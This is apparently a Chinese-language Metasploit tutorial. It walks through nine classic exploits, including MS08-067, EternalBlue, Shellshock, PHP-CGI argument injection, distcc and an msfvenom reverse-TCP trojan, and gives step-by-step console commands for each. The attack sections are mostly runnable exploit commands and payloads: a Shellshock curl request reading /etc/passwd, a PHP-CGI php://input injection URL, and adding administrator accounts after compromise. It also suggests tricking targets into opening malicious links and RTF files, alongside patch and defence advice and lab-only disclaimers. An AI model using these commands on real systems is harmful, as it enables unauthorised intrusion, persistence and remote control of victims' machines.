一、MSF 是什么一句话讲明白Metasploit 就是一个漏洞框架。你可以把它想象成一把万能钥匙里面装了各种开锁工具漏洞利用模块。遇到什么锁漏洞你就掏出对应的钥匙模块拧几下配置参数门就开了拿到权限。它的全称是 The Metasploit Framework简称 MSF。在 Kali Linux 里它是预装的标准安装目录在/usr/share/metasploit-framework/这个目录下最核心的就是modules文件夹里面分门别类地放着各种漏洞利用模块。二、MSF 基本命令新手必背的 10 个命令玩 MSF 其实很简单就那几个命令翻来覆去地用。下面我给你列了最常用的背下来就行1.msfconsole— 启动 MSF这是进入 MSF 控制台的命令相当于开机。直接终端里输入msfconsole等一会儿就进入 MSF 的命令行界面了。2.?— 查看帮助不知道干啥的时候输入?就能看到所有命令列表。想查某个具体命令怎么用比如search就输入? search3.search— 搜索漏洞模块这是最常用的命令之一。比如你想找 ms08-067 这个漏洞的模块就搜search ms08-067它会列出所有相关的模块你挑一个用就行。4.use— 使用加载某个模块找到想用的模块后用use加载它。比如use exploit/windows/smb/ms08_067_netapi加载完之后你的命令提示符会变成模块的名字告诉你现在在哪个模块下面。5.back— 返回上一级在模块里待腻了想回去就输入back跟你在文件系统里cd ..一个意思。6.connect— 连接主机这个命令可以让你直接连接到某个主机的某个端口相当于一个简易的 telnet。比如连接百度的 80 端口connect www.baidu.com 807.info— 查看模块详细信息想了解某个模块是干啥的、影响什么系统、需要设置什么参数就用infoinfo exploit/windows/smb/ms08_067_netapi8.show options— 查看需要配置的参数进入一个模块后最关键的一步就是看要设置什么参数。输入show options它会列出所有参数标着yes的是必须设置的no的是可选的。9.set— 设置参数知道要设置什么了就用set来配置。比如设置目标 IPset RHOST 192.168.1.100RHOST 就是 Remote Host远程主机的意思。10.run/exploit— 执行攻击参数都设好了就差最后一步了输入run或者exploit攻击就开始了run或者exploit效果是一样的。其他几个常用的jobs— 查看和管理后台运行的任务sessions— 查看已经拿到的会话shellsessions -i 1— 进入第 1 个会话quit/exit— 退出 MSF三、9 个经典漏洞实战手把手教你用光说不练假把式。下面咱们通过 9 个经典漏洞来看看 MSF 到底怎么用。每个漏洞我都会给你命令汇总 详细步骤 大白话原理。⚠️ 注意以下内容仅用于学习和合法的渗透测试请不要用于未经授权的系统。漏洞 1MS08-067 — 网络服务器攻击经典中的经典环境靶机 WinXP SP3一句话描述通过 Windows 的 445 端口SMB 服务直接拿系统权限当年大名鼎鼎的震网病毒都用过类似的漏洞。命令汇总速查表msfconsole search MS08-067 use exploit/windows/smb/ms08_067_netapi show options set RHOST 192.168.244.7 run shell net user net user test test /add net user net user test /del详细步骤第一阶段启动 MSF准备攻击打开终端输入msfconsole进入 MSF 控制台。第二阶段找漏洞模块配置参数搜索漏洞search MS08-067加载模块use exploit/windows/smb/ms08_067_netapi看需要设置啥show options设置目标 IPset RHOST 192.168.0.8把 IP 换成你靶机的 IP第三阶段开打拿权限输入run等一会儿如果成功了你就会看到 meterpreter 的提示符。然后输入shell就能拿到目标机器的命令行窗口了。第四阶段后渗透操作用户管理拿到 shell 后你就可以为所欲为了。比如net user— 查看当前系统有哪些用户net user test test /add— 添加一个用户 test密码也是 testnet user test /del— 删除用户 test原理这个漏洞说白了就是Windows 的 SMB 服务在处理路径的时候太粗心了。你可以这么理解Windows 的 445 端口有个保安NetPathCanonicalize 函数专门负责检查访问路径合不合法。但是这个保安干活不仔细遇到..\这种相对路径的时候没检查边界就直接处理了。攻击者就利用这一点构造一个特别长的恶意路径把保安的工作记录栈缓冲区给撑爆了缓冲区溢出然后把保安的下一步去哪返回地址改成攻击者指定的地方。这样 CPU 就乖乖地去执行攻击者的代码了。影响的系统Windows 2000、XP、Server 2003 这些老系统没打 2008 年 10 月的补丁KB958644。怎么防御打补丁 KB958644最根本的办法关掉 445 端口或者用防火墙限制 SMB 服务监控网络流量检测恶意的 SMB 请求漏洞 2MS10-018 — 浏览器攻击打开网页就中招环境靶机 WinXP SP3 IE 浏览器一句话描述你做一个恶意网页骗目标用 IE 打开他一打开你就能拿到他电脑的权限。命令汇总速查表msfconsole search ms10-018 use exploit/windows/browser/ms10_018_ie_behaviors set SRVHOST 192.168.244.4 # 填你自己Kali的 IP set PAYLOAD windows/meterpreter/bind_tcp set LPORT 4441 exploit -j jobs sessions sessions -i 1 shell详细步骤第一阶段启动 MSF输入msfconsole进入控制台。第二阶段搜索并加载漏洞模块search ms10-018— 找模块use exploit/windows/browser/ms10_018_ie_behaviors— 用这个模块第三阶段配置攻击参数show options— 看看要设置啥set SRVHOST 192.168.11.111— 设置你自己的 IP攻击机 IPset PAYLOAD windows/meterpreter/bind_tcp— 设置正向连接的 payloadshow options— 再看看 payload 的选项set LPORT 4441— 改个端口号方便识别第四阶段启动攻击服务输入runMSF 会生成一个 URL 地址。你把这个 URL 通过社工比如发邮件、发链接骗目标用 IE 打开。目标一访问MSF 这边就会显示成功了。第五阶段查看会话进去搞事情sessions— 看看有哪些会话sessions -i 1— 进入第 1 个会话-i 就是 enter 进去的意思shell— 拿到命令行看看 IP 是不是目标机器 小提示如果你靶机里装了 OllyDbgOD这种调试器IE 可能会弹出调试窗口导致攻击失败。把 OD 删掉就好了。原理这个漏洞出在 IE 浏览器里的一个叫TDCTabular Data Control的 ActiveX 控件上。这个控件本来是用来加载表格数据比如 CSV 文件的但是它在处理 URL 参数的时候没检查长度。你给它一个特别长的 URL它的缓冲区就被撑爆了堆溢出。攻击流程大概是这样的你做一个恶意网页里面嵌了一段 JavaScript目标用 IE 打开这个网页TDC 控件就被加载了超长的 URL 参数把控件的内存搞坏了攻击者趁机把 CPU 引到自己的恶意代码Shellcode上目标的电脑就被控制了影响的系统IE 6/7/8 版本Windows XP 这些老系统。怎么防御打补丁 KB980182微软官方修复禁用 ActiveX 控件开启 DEP数据执行保护和 ASLR地址空间随机化升级到新版本的浏览器漏洞 3MS10-087 — 用 Word 文档搞事情文件格式漏洞环境靶机 WinXP SP3 Word一句话描述你生成一个恶意的 Word 文档RTF 格式发给目标他一打开就中招。命令汇总速查表msfconsole use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof set payload windows/exec set CMD calc.exe set FILENAME ceshi.rtf run详细步骤第一阶段加载文件型漏洞模块进入 MSFmsfconsole搜索模块search ms10-087使用模块use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof第二阶段配置攻击载荷看需要设置啥show options改文件名set FILENAME ceshi.rtf生成的恶意文件叫啥设置 payload这次我们不用交互式的 shell 了换一个简单的让它弹个计算器set payload windows/exec set CMD calc.exe第三阶段生成恶意文件输入run文件就生成了。生成的文件在~/.msf4/local/目录下root 用户就是/root/.msf4/local/。你把这个ceshi.rtf文件发给目标他用 Word 一打开计算器就弹出来了。真实场景下可以把 calc.exe 换成更厉害的 payload原理这个漏洞出在Word 解析 RTF 文件的逻辑里。RTF 是一种富文本格式里面有各种控制字就像 HTML 标签一样。其中有个叫pnfragments的控制字Word 在处理它的时候没检查属性字符串的长度。你可以这么理解Word 给这个控制字的属性留了一个小盒子固定大小的栈缓冲区但是如果攻击者塞进去一个特别长的字符串盒子就装不下了溢出来的数据就把旁边的返回地址给覆盖了。CPU 本来应该回到原来的地方继续执行结果被拐到了攻击者的恶意代码那里。影响的系统操作系统Windows XP SP3、Server 2003、Vista、7Office 版本Office 2003 SP3、2007 SP2、2010还有 Mac 版 Office真实案例2010-2011 年的时候这个漏洞被大量用于挂马攻击全球超过 50% 的挂马网站都在用它传播木马。怎么防御打补丁 KB2423930禁用 RTF 解析功能开启 DEP 和 Office 的受保护视图Protected View邮件监控检测异常的 RTF 文件漏洞 4CVE-2017-7494 — Samba 漏洞入侵 LinuxLinux 版永恒之蓝环境靶机 Vulhub一个漏洞练习平台一句话描述Linux 上的 Samba 服务就是 Windows 和 Linux 之间共享文件的服务有个漏洞能直接拿 root 权限。命令汇总速查表# 靶机上Vulhub用 root 执行 cd /home/enjoy/vulhub-master/samba/CVE-2017-7494 docker-compose up -d # Kali 上执行 msfconsole use exploit/linux/samba/is_known_pipename set RHOSTS 192.168.244.6 # 靶机 IP run id详细步骤第一步启动靶机环境在 Vulhub 靶机上切换到 root 用户然后进入漏洞目录cd /home/enjoy/vulhub-master/samba/CVE-2017-7494 docker-compose up -d靶机就启动好了。用ifconfig看看靶机 IP 是多少比如是 192.168.244.6。第二步Kali 上用 MSF 攻击启动 MSFmsfconsole使用模块use exploit/linux/samba/is_known_pipename设置目标 IPset RHOSTS 192.168.244.6开打run成功之后输入id看看应该就是 root 权限了。原理这个漏洞叫 SambaCry被称为Linux 版的永恒之蓝。漏洞的核心是 Samba 在处理命名管道Named Pipe的时候路径验证有问题。你可以这么理解Samba 有个保安is_known_pipename函数负责检查客户端请求的管道名字合不合法但是这个保安太蠢了你给它一个带/的路径比如/home/attacker/malicious.so它居然把这个当成了服务器上的绝对路径攻击者先通过可写的共享目录上传一个恶意的.so文件Linux 的动态库就相当于 Windows 的 DLL然后让 Samba 去加载这个恶意 .so 文件Samba 是以 root 权限运行的所以加载恶意库的时候恶意代码也就有了 root 权限攻击前提目标有一个可写的 Samba 共享目录匿名可写或者有弱口令Samba 版本在 3.5.0 到 4.6.4/4.5.10/4.4.14 之间怎么防御升级 Samba 到 4.6.4 以上版本在 smb.conf 里加上nt pipe support no禁用命名管道共享目录设为只读不让上传文件防火墙限制 445 端口的访问不要用 root 运行 Samba 服务漏洞 5CVE-2014-6271 — Bash Shellshock破壳漏洞环境靶机 Vulhub一句话描述BashLinux 的命令行解释器有个致命漏洞通过 HTTP 请求头就能远程执行命令当年轰动全球。命令汇总速查表# 靶机上Vulhub用 root 执行 docker-compose down cd /home/enjoy/vulhub-master/bash/shellshock docker-compose build docker-compose up -d docker-compose config # 启动后访问 http://your-ip:8080/victim.cgi # Kali 上执行 msfconsole use exploit/multi/http/apache_mod_cgi_bash_env_exec set RHOSTS 192.168.244.6 # 靶机 IP set RPORT 8080 set TARGETURI /victim.cgi run shell id 小知识www-data是 Linux/Unix 系统专门用来跑 Web 服务比如 Apache、Nginx的用户破壳漏洞拿到的默认权限就是它。原理Shellshock破壳漏洞是 2014 年爆出的一个超级大漏洞CVSS 评分 10.0最高危影响全球数亿台设备。漏洞是怎么回事呢Bash 有个功能可以把函数定义通过环境变量导出export -f。比如func() { echo Hello; } export -f func这样子进程也能用到这个函数。但是问题来了Bash 在解析这种环境变量的时候没检查函数定义的边界。攻击者构造一个这样的环境变量VAR() { :; }; echo Vulnerable() { :; }— 这是一个合法的空函数定义echo Vulnerable— 这是注入的恶意命令Bash 解析的时候傻呵呵地把后面的echo Vulnerable也当成了函数定义的一部分直接就执行了这就像 SQL 注入一样代码和数据混在一起了。远程怎么利用呢漏洞本身不能直接远程触发得借助第三方服务。最常见的就是 Apache CGI攻击者发一个 HTTP 请求把恶意代码放在请求头里比如 User-Agent、CookieApache 收到请求把请求头放进环境变量里然后调用 Bash 执行 CGI 脚本Bash 解析环境变量的时候恶意代码就被执行了比如用 curl 可以这样测试curl -H User-Agent: () { :; }; /bin/bash -c cat /etc/passwd http://victim/cgi-bin/test.cgi影响的系统所有用 Bash 1.14 到 4.3 版本的 Linux/Unix 系统包括各种服务器、嵌入式设备路由器、Docker 镜像。怎么防御升级 Bash 到 4.3-013 以上版本Web 服务器配置过滤规则拦截包含() {的请求头用非特权用户运行 Web 服务用 Alpine Linux 这种不依赖 Bash 的轻量系统漏洞 6CVE-2012-1823 — PHP CGI 漏洞环境靶机 Vulhub一句话描述PHP 的 CGI 模式下URL 里的查询字符串被当成了命令行参数导致远程代码执行。命令汇总速查表# 靶机上Vulhub用 root 执行 docker-compose down cd /home/enjoy/vulhub-master/php/CVE-2012-1823 docker-compose build docker-compose up -d docker-compose config # 启动后访问 http://your-ip:8080/ 看到Hello # 访问 http://your-ip:8080/index.php?-s 能看到源码说明有漏洞 # Kali 上执行 msfconsole use exploit/multi/http/php_cgi_arg_injection set RHOSTS 192.168.244.6 # 靶机 IP set RPORT 8080 run shell id原理PHP 有好几种运行模式CLI命令行、CGI、FastCGI、Apache 模块mod_php。漏洞出在 CGI 模式下。按照 CGI 协议RFC 3875的规定HTTP 请求的查询字符串就是?后面的东西应该作为QUERY_STRING环境变量传给 PHP而不应该直接当成命令行参数。但是 PHP 早期版本为了方便开发测试允许通过查询字符串传递命令行参数比如-d、-s。这就出问题了攻击者可以在 URL 里构造以-开头的参数PHP-CGI 傻乎乎地把这些当成了命令行选项-s— 显示页面源码信息泄露-d— 修改 PHP 配置项最危险-i— 显示 PHP 环境信息最经典的利用方式是这样的http://target/cgi.php?-dallow_url_includeon-dauto_prepend_filephp://input什么意思呢-d allow_url_includeon— 打开包含远程文件的开关-d auto_prepend_filephp://input— 让 PHP 在执行脚本前先加载php://input也就是 POST 请求体然后攻击者用 POST 请求把恶意代码比如?php system(id); ?发过去PHP 就乖乖执行了。影响的版本PHP 5.0.0 到 5.3.11以及 5.4.0 到 5.4.1。怎么防御升级 PHP 到 5.3.12/5.4.2 以上别用 PHP-CGI 模式改用 PHP-FPMFastCGI或者 mod_phpWeb 服务器配置过滤规则拦截包含-d、-s等参数的请求用非特权用户运行 PHP漏洞 7CVE-2004-2678 — Distcc 后门漏洞环境靶场 Metasploitable2-Linux用户名/密码msfadmin/msfadmin一句话描述分布式编译工具 Distcc 配置不当任何人都能连上去执行命令。命令汇总速查表use exploit/unix/misc/distcc_exec set payload cmd/unix/reverse_perl set rhost 192.168.244.8 # 靶机 IP set lhost 192.168.244.4 # 你自己Kali的 IP exploit id原理Distcc 是谷歌开源的一个分布式编译工具。干啥用的呢比如你要编译 Linux 内核代码特别大一台机器编译要很久。用 Distcc 就可以把编译任务分到好几台服务器上并行编译速度就快多了。它默认监听 3632 端口。漏洞在哪呢早期的 Distcc 版本2.x 系列默认配置不限制客户端 IP谁都能连到 3632 端口。而且 distccd 服务通常是以高权限用户甚至 root运行的。Distcc 本来是接收客户端发来的编译指令比如 gcc 命令然后去编译代码。但是它对客户端发来的指令完全信任不做任何验证。那攻击者就开心了我发的不是编译指令而是系统命令行不行当然可以直接就执行了。攻击步骤用 nmap 扫目标网络的 3632 端口看看哪些机器开了 Distcc用 MSF 的exploit/unix/misc/distcc_exec模块设置目标 IP 和自己的 IP执行exploit直接拿 shell影响的版本Distcc 2.x 系列还有 Xcode 1.5 里集成的 Distcc。怎么防御升级到 Distcc 3.0 以上配置文件里限制允许连接的客户端 IP--allow 192.168.1.0/24用非特权用户运行 distccd防火墙关掉 3632 端口或者只对内网开放监控 3632 端口的异常流量漏洞 8MS17-010 — 永恒之蓝最著名的勒索病毒漏洞环境靶场 Win7一句话描述SMB 协议的内核级漏洞不需要用户交互扫到 445 端口开着就能打。WannaCry 勒索病毒就是用的这个漏洞。命令汇总速查表msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/shell/bind_tcp set rhosts 192.168.209.129 set LHOST 0.0.0.0 run net user test test /add net localgroup administrators test /add net user net user test /del详细步骤第一阶段启动 MSF输入msfconsole进入控制台。第二阶段选择攻击脚本use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/shell/bind_tcp set rhosts 192.168.209.129 # 靶机 IP set LHOST 0.0.0.0 run成功之后就拿到 shell 了你可以添加用户、加到管理员组等等。原理永恒之蓝EternalBlue是 2017 年泄露的一个超级漏洞来头可不小——它是美国国家安全局NSA开发的黑客工具后来被黑客组织影子经纪人Shadow Brokers泄露了。这个漏洞有多厉害CVSS 评分 10.0满分不需要用户交互—— 只要你开着 445 端口连上网就能被打内核级权限—— 直接以内核模式执行代码什么防护都能绕过蠕虫式传播—— 感染一台后自动扫描内网其他机器迅速扩散漏洞原理是什么呢漏洞出在 Windows 的 SMB 协议文件共享协议445 端口处理FEALIST文件扩展属性列表的逻辑里。简单说就是SMB 协议有个函数叫SrvOs2FeaListSizeToNt负责把一种格式的 FEALIST 转换成另一种格式。但是这个函数在计算需要多大内存的时候算错了导致堆缓冲区溢出。而且这个漏洞有 7 个小缺陷组合在一起NSA 出品必属精品缓冲区没初始化攻击者可以写任意数据某个子命令的长度检查失效可以发超长参数响应数据长度越界时序漏洞可以干扰内存状态数据包类型混淆扩展属性类型分配错误内核态和用户态没隔离好攻击流程大概是这样的攻击者发很多 SMB 请求在目标内存里占位置Grooming 技术发一个带恶意 FEALIST 的请求触发溢出溢出的数据覆盖了关键的内存指针攻击者通过这个指针把恶意代码写到内核里利用 Windows 的 APC 机制让恶意代码在内核里执行完事了系统就是你的了真实案例WannaCry想哭勒索病毒2017 年席卷全球感染了 20 多万台设备医院、交通系统都瘫痪了NotPetya伪装成勒索软件实际上是搞破坏的针对乌克兰基础设施各种挖矿蠕虫比如 Adylkuzz偷偷用别人的电脑挖门罗币影响的系统Windows XP、Vista、7、8、102017 年 3 月前的版本Windows Server 2003、2008、2008 R2、2012怎么防御打补丁打补丁打补丁—— 安装 KB4013389最重要的事情说三遍关闭 SMBv1 协议用 PowerShellDisable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol防火墙阻断 445 端口的入站访问开启 SMB 签名防止中间人攻击开启 HVCI基于虚拟化的安全和 CFG控制流防护漏洞 9用 MSF 制作木马远程控制电脑环境靶场 Win7一句话描述用 msfvenom 生成一个木马程序骗目标运行然后你就能远程控制他的电脑了。命令汇总速查表# 第一步制作木马 msfvenom -p windows/meterpreter/reverse_tcp lhost192.168.209.128 lport7788 -f exe hello.exe # 第二步创建监听在 MSF 里 msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 7788 exploit -j # 第三步目标运行木马后你就能控制了 screenshot # 截屏 ipconfig # 查看 IP shell # 拿命令行 run vnc # 远程桌面控制详细步骤第一阶段制作病毒木马msfvenom是 MSF 自带的一个工具是msfpayload和msfencode的结合体专门用来生成木马程序。打开终端输入msfvenom -p windows/meterpreter/reverse_tcp lhost192.168.209.128 lport7788 -f exe hello.exe解释一下参数-p windows/meterpreter/reverse_tcp— payload 用反向 TCP 连接的 meterpreterlhost192.168.209.128— 你的 IPKali 的 IP木马里硬编码了这个地址目标运行后会回连到你这lport7788— 你的监听端口-f exe— 输出格式是 exe 可执行文件 hello.exe— 保存成 hello.exe执行完就生成了一个hello.exe木马文件。第二阶段创建监听木马生成了目标运行后会连你那你得先等着才行。进入 MSFmsfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 7788 exploit -jexploit -j的意思是在后台运行监听任务。第三阶段目标运行木马开始控制把hello.exe发给目标他一运行你这边就会收到会话。然后你就能为所欲为了screenshot— 截个屏看看目标在干啥ipconfig— 看看目标的网络配置shell— 拿命令行run vnc— 远程桌面控制就像坐在目标电脑前一样原理这个原理其实很简单就是反向连接木马的思路你攻击者在自己电脑上开个端口等着别人连过来监听木马程序里写死了你的 IP 和端口目标运行木马后木马主动来连你连接建立后你就可以给木下发命令木马在目标电脑上执行为什么叫反向连接呢因为通常是客户端连服务器但这里是目标被攻击者主动连攻击者方向反了。这么做的好处是目标电脑的防火墙一般不会拦出站连接往外连的所以很容易成功。再次提醒以上内容仅供学习请不要用于非法用途四、总结一下好了9 个漏洞讲完了咱们来回顾一下漏洞编号类型一句话端口/方式MS08-067Windows SMB 漏洞经典老漏洞445 端口直接拿权限445 端口MS10-018浏览器漏洞IE 的 ActiveX 控件溢出开网页就中招HTTP 社工MS10-087文件格式漏洞Word 解析 RTF 溢出打开文档就中招邮件/文件 社工CVE-2017-7494Linux Samba 漏洞Linux 版永恒之蓝Samba 服务漏洞445 端口CVE-2014-6271Bash 破壳漏洞Bash 环境变量注入通过 HTTP 头远程执行HTTP/CGICVE-2012-1823PHP CGI 漏洞PHP-CGI 参数注入URL 里就能传命令HTTPCVE-2004-2678Distcc 漏洞分布式编译工具配置不当直接命令执行3632 端口MS17-010永恒之蓝内核级 SMB 漏洞蠕虫式传播445 端口msfvenom木马制作生成木马程序反向连接控制社工 反向连接几个共同点大部分漏洞都是缓冲区溢出或者输入验证不严导致的打补丁是最根本的防御方法权限最小化、防火墙、入侵检测这些纵深防御措施也很重要社工社会工程学往往是突破口技术再好也架不住人点了可疑链接学习建议先把 MSF 的基本命令练熟每个漏洞都亲手复现一遍用靶场别搞事理解原理比死记命令重要多关注安全资讯了解最新的漏洞和防护技术好了今天的内容就到这里。安全路漫漫咱们一起学习进步